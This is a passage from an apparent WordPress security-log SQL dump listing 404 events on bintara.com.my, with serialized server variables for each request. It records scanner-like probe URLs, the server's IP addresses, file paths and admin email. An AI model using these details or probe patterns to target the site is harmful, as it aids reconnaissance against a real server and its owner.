9\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa2dSm1ncq3cUuJao9IoCQAAAJA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571659082.3865\";s:12:\"REQUEST_TIME\";s:10:\"1571659082\";}}','notice','2019-10-21 11:58:04','2019-10-21 11:58:02',34970480,36767448,'https://bintara.com.my/website/?initiationactivity=initiationready',1,0,'64.140.200.40'),(28611,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:28:\"/website/?key=testActivation\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/website/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:9:\"/website/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa2dvG1ncq3cUuJao9IotgAAAIs\";s:19:\"REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/website/\";s:19:\"REDIRECT_SCRIPT_URL\";s:9:\"/website/\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa2dvG1ncq3cUuJao9IotgAAAIs\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"64.140.200.40\";s:11:\"REMOTE_PORT\";s:5:\"47852\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:31:\"https://bintara.com.my/website/\";s:10:\"SCRIPT_URL\";s:9:\"/website/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa2dvG1ncq3cUuJao9IotgAAAIs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571659196.8488\";s:12:\"REQUEST_TIME\";s:10:\"1571659196\";}}','notice','2019-10-21 11:59:58','2019-10-21 11:59:57',34970064,36767000,'https://bintara.com.my/website/?key=testActivation',1,0,'64.140.200.40'),(28612,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:40:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"/service-title-6/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:66:\"Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"https://bintara.com.my/service-title-6/\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/service-title-6/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa2oX21ncq3cUuJao9I1CAAAAJg\";s:12:\"REDIRECT_URL\";s:17:\"/service-title-6/\";s:11:\"REMOTE_ADDR\";s:12:\"54.36.150.14\";s:11:\"REMOTE_PORT\";s:5:\"21696\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"https://bintara.com.my/service-title-6/\";s:10:\"SCRIPT_URL\";s:17:\"/service-title-6/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa2oX21ncq3cUuJao9I1CAAAAJg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571661919.2033\";s:12:\"REQUEST_TIME\";s:10:\"1571661919\";}}','notice','2019-10-21 12:45:21','2019-10-21 12:45:19',34967808,36775048,'https://bintara.com.my/service-title-6/',1,0,'54.36.150.14'),(28613,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:40:\"/cms/?initiationactivity=initiationready\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:27:\"https://bintara.com.my/cms/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:5:\"/cms/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa2sL21ncq3cUuJao9I3ywAAAJQ\";s:19:\"REDIRECT_SCRIPT_URI\";s:27:\"https://bintara.com.my/cms/\";s:19:\"REDIRECT_SCRIPT_URL\";s:5:\"/cms/\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa2sL21ncq3cUuJao9I3ywAAAJQ\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"37.187.72.67\";s:11:\"REMOTE_PORT\";s:5:\"56993\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:27:\"https://bintara.com.my/cms/\";s:10:\"SCRIPT_URL\";s:5:\"/cms/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa2sL21ncq3cUuJao9I3ywAAAJQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571662895.8704\";s:12:\"REQUEST_TIME\";s:10:\"1571662895\";}}','notice','2019-10-21 13:01:38','2019-10-21 13:01:36',34971512,36779848,'https://bintara.com.my/cms/?initiationactivity=initiationready',1,0,'37.187.72.67'),(28614,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:24:\"/cms/?key=testActivation\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:27:\"https://bintara.com.my/cms/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:5:\"/cms/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa2sbxAAxqfYqgF3mYel0wAAAFI\";s:19:\"REDIRECT_SCRIPT_URI\";s:27:\"https://bintara.com.my/cms/\";s:19:\"REDIRECT_SCRIPT_URL\";s:5:\"/cms/\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa2sbxAAxqfYqgF3mYel0wAAAFI\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"37.187.72.67\";s:11:\"REMOTE_PORT\";s:5:\"34470\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:27:\"https://bintara.com.my/cms/\";s:10:\"SCRIPT_URL\";s:5:\"/cms/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa2sbxAAxqfYqgF3mYel0wAAAFI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571662959.9693\";s:12:\"REQUEST_TIME\";s:10:\"1571662959\";}}','notice','2019-10-21 13:02:41','2019-10-21 13:02:40',34968920,36781712,'https://bintara.com.my/cms/?key=testActivation',1,0,'37.187.72.67'),(28615,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:25:\"/beta/?key=testActivation\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/beta/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:6:\"/beta/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa2uExAAxqfYqgF3mYenxAAAAE4\";s:19:\"REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/beta/\";s:19:\"REDIRECT_SCRIPT_URL\";s:6:\"/beta/\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa2uExAAxqfYqgF3mYenxAAAAE4\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"104.238.97.201\";s:11:\"REMOTE_PORT\";s:5:\"51144\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:28:\"https://bintara.com.my/beta/\";s:10:\"SCRIPT_URL\";s:6:\"/beta/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa2uExAAxqfYqgF3mYenxAAAAE4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571663379.5971\";s:12:\"REQUEST_TIME\";s:10:\"1571663379\";}}','notice','2019-10-21 13:09:41','2019-10-21 13:09:39',34967792,36780952,'https://bintara.com.my/beta/?key=testActivation',1,0,'104.238.97.201'),(28616,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:41:\"/beta/?initiationactivity=initiationready\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/beta/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:6:\"/beta/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa2u0RAAxqfYqgF3mYeoWQAAAFY\";s:19:\"REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/beta/\";s:19:\"REDIRECT_SCRIPT_URL\";s:6:\"/beta/\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa2u0RAAxqfYqgF3mYeoWQAAAFY\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"104.238.97.201\";s:11:\"REMOTE_PORT\";s:5:\"44884\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:28:\"https://bintara.com.my/beta/\";s:10:\"SCRIPT_URL\";s:6:\"/beta/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa2u0RAAxqfYqgF3mYeoWQAAAFY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571663569.2115\";s:12:\"REQUEST_TIME\";s:10:\"1571663569\";}}','notice','2019-10-21 13:12:50','2019-10-21 13:12:49',34970176,36770400,'https://bintara.com.my/beta/?initiationactivity=initiationready',1,0,'104.238.97.201'),(28617,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:44:\"/staging/?initiationactivity=initiationready\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/staging/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:9:\"/staging/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa24bqjZzpoQqaKQA3IkIgAAAMc\";s:19:\"REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/staging/\";s:19:\"REDIRECT_SCRIPT_URL\";s:9:\"/staging/\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa24bqjZzpoQqaKQA3IkIgAAAMc\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"104.238.97.201\";s:11:\"REMOTE_PORT\";s:5:\"50456\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:31:\"https://bintara.com.my/staging/\";s:10:\"SCRIPT_URL\";s:9:\"/staging/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa24bqjZzpoQqaKQA3IkIgAAAMc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571666030.9985\";s:12:\"REQUEST_TIME\";s:10:\"1571666030\";}}','notice','2019-10-21 13:53:53','2019-10-21 13:53:51',34971992,36784672,'https://bintara.com.my/staging/?initiationactivity=initiationready',1,0,'104.238.97.201'),(28618,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:28:\"/staging/?key=testActivation\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/staging/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:9:\"/staging/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa24oBAAxqfYqgF3mYexTAAAAEY\";s:19:\"REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/staging/\";s:19:\"REDIRECT_SCRIPT_URL\";s:9:\"/staging/\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa24oBAAxqfYqgF3mYexTAAAAEY\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"104.238.97.201\";s:11:\"REMOTE_PORT\";s:5:\"56036\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:31:\"https://bintara.com.my/staging/\";s:10:\"SCRIPT_URL\";s:9:\"/staging/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa24oBAAxqfYqgF3mYexTAAAAEY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571666081.1008\";s:12:\"REQUEST_TIME\";s:10:\"1571666081\";}}','notice','2019-10-21 13:54:43','2019-10-21 13:54:41',34969712,36770984,'https://bintara.com.my/staging/?key=testActivation',1,0,'104.238.97.201'),(28619,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:126:\"/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fbestlaptopscollegestudents.blogspot.com&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, 